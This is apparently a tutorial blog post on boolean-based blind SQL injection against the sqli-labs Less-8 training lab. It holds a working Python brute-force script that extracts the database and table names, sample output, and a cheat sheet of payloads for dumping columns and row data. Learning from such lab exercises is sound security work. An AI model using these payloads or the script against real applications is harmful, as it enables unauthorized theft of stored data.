Blind SQL injection in practice
While studying SQL injection recently I became interested in blind-injection techniques and wrote a few Python scripts for it. The environment used here is Less-8 of sqli-labs; the same approach can be adapted to other targets.
1. Database name length
payload: ' and length(database())={}--+    // {} is the position being brute-forced (the candidate length)
2. Brute-forcing each character of the database name
payload: ' and substr(database(),{},1)='{}'--+    // the first {} is the character position (1-based), the second is the candidate character
Note that under MySQL's default case-insensitive (_ci) collations the '=' comparison treats 'a' and 'A' as equal, so the character reported is whichever case comes first in the candidate list; prefix the expression with binary, or compare ascii() values, if the exact case matters.
3. Number of tables in the target database
payload: ' and (select count(table_name) from information_schema.tables where table_schema='{}')={}--+    // the first {} is the database name, the second is the candidate table count
4. Length of each table name
payload: ' and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)={}--+    // the placeholders are the database name, the table index (0-based, used as the LIMIT offset) and the candidate length
5. Table names
payload: ' and substr((SELECT table_name from information_schema.tables WHERE table_schema='{}' LIMIT {},1),{},1)='{}'--+    // database name, table index, character position, candidate character
6. The code
Dumping row data uses the same kind of payloads. The source is below; my environment runs locally and the url is "http://sqlilabs/Less-8/?id=1". Less-8 is a boolean-based blind: when the injected condition is true the page prints "You are in...", otherwise it prints nothing, so every request answers exactly one yes/no question.
#### Retrieving data with blind injection
import requests
import time

header = {
    "Host": "sqlilabs",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.60",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
    "Connection": "close"
}
# Candidate characters, tried in order; the first one that matches wins.
# (The original list had 'Z' twice and no 'X'.)
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*()_+<>?"
url = "http://sqlilabs/Less-8/?id=1"
# Less-8 prints this string only when the injected condition is true.
true_marker = "You are in"

length_payload = "' and length(database())={}--+"

def get_length(url, length_payload):
    """Find length(database()) by trying 1..49 and watching for the true marker."""
    for x in range(1, 50):
        ex_url = url + length_payload.format(x)
        print(ex_url)
        response = requests.get(ex_url, headers=header)
        if true_marker in response.text:
            print("Length is " + str(x))
            return x
    return None  # nothing below 50 matched

length = get_length(url, length_payload)

data_payload = "' and (substr(database(),{},1))='{}'--+"

def get_data(url, data_payload, length):
    """Recover database() one character at a time by trying every candidate."""
    data = ""
    start_time = time.time()
    for x in range(1, length + 1):
        for char in chars:
            ex_url = url + data_payload.format(x, char)
            response = requests.get(ex_url, headers=header)
            if true_marker in response.text:
                data += char
                print("Data is " + data)
                break
    end_time = time.time()
    print("Time taken: {}".format(end_time - start_time))
    return data

name = get_data(url, data_payload, length)
print("Database name: " + name)

table_count_payload = "' and (select count(table_name) from information_schema.tables where table_schema='{}')={}--+"

def get_table_count(url, table_payload, db_name):
    """Count the tables in db_name by trying 1..49."""
    for x in range(1, 50):
        ex_url = url + table_payload.format(db_name, x)
        print(ex_url)
        response = requests.get(ex_url, headers=header)
        if true_marker in response.text:
            print("Number of tables is " + str(x))
            return x
    return None

table_count = get_table_count(url, table_count_payload, name)

table_length_payload = "' and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)={}--+"
table_name_payload = "' and substr((SELECT table_name from information_schema.tables WHERE table_schema='{}' LIMIT {},1),{},1)='{}'--+"

def get_table_name(url, table_length_payload, table_name_payload, table_count, db_name):
    """For each table: find the name length, then recover the name character by character."""
    table_list = []
    start_time = time.time()
    for i in range(1, table_count + 1):
        data = ""
        # find the length of the i-th table name (the LIMIT offset is i - 1)
        for tlen in range(1, 50):
            ex_url = url + table_length_payload.format(db_name, i - 1, tlen)
            # print(ex_url)
            response = requests.get(ex_url, headers=header)
            if true_marker in response.text:
                # print("Table {} has length {}".format(i, tlen))
                # now brute-force each character of the name
                for j in range(1, tlen + 1):
                    for char in chars:
                        ex_url2 = url + table_name_payload.format(db_name, i - 1, j, char)
                        # print(ex_url2)
                        response = requests.get(ex_url2, headers=header)
                        if true_marker in response.text:
                            data += char
                            # print("Data is " + data)
                            break
                table_list.append(data)
                break
        # print("Table {} is named {}".format(i, data))
    end_time = time.time()
    print("Time taken: {}".format(end_time - start_time))
    return table_list

print(get_table_name(url, table_length_payload, table_name_payload, table_count, name))
7. Results
Run it and look at the output.
Length is 8
Data is s
Data is se
Data is sec
Data is secu
Data is secur
Data is securi
Data is securit
Data is security
Time taken: 1.7992594242095947
Database name: security
Number of tables is 4
Time taken: 6.969999313354492
['emails', 'referers', 'uagents', 'users']
I commented out the payload printing in the table-name function; if you want to see the payloads, uncomment those print lines. One caveat: if a character is not in chars, the inner loop finds no match and that position is silently skipped, so the recovered name comes out short; widen chars if a result looks truncated.
8. Common blind-injection payloads
A summary of the common boolean-blind payloads (the column-name payloads of the original list had a missing quote and a misspelt table_name; the row-data payloads now take the row index and character position as placeholders instead of hardcoding 0 and 1):
Database name length: ' and length((select schema_name from information_schema.schemata limit 0,1))={}--+
Database name: ' and substring((select schema_name from information_schema.schemata limit 0,1),{},1)='{}'--+
Number of tables in a given database: ' and (select count(table_name) from information_schema.tables where table_schema='{}')={}--+
Table name length in a given database: ' and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)={}--+
Table name in a given database: ' and substr((SELECT table_name from information_schema.tables WHERE table_schema='{}' LIMIT {},1),{},1)='{}'--+
Number of columns in a table: ' and (select count(column_name) from information_schema.columns where table_schema='{}' and table_name='{}')={}--+
Column name length: ' and (select length(column_name) from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1)={}--+
Column name: ' and substr((select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1),{},1)='{}'--+
Number of rows in a table: ' and (select count(*) from {})={}--+
Length of a column value in a given row: ' and length((select {} from {} limit {},1))={}--+    // column, table, row index, candidate length
Character of a column value in a given row: ' and substr((select {} from {} limit {},1),{},1)='{}'--+    // column, table, row index, character position, candidate character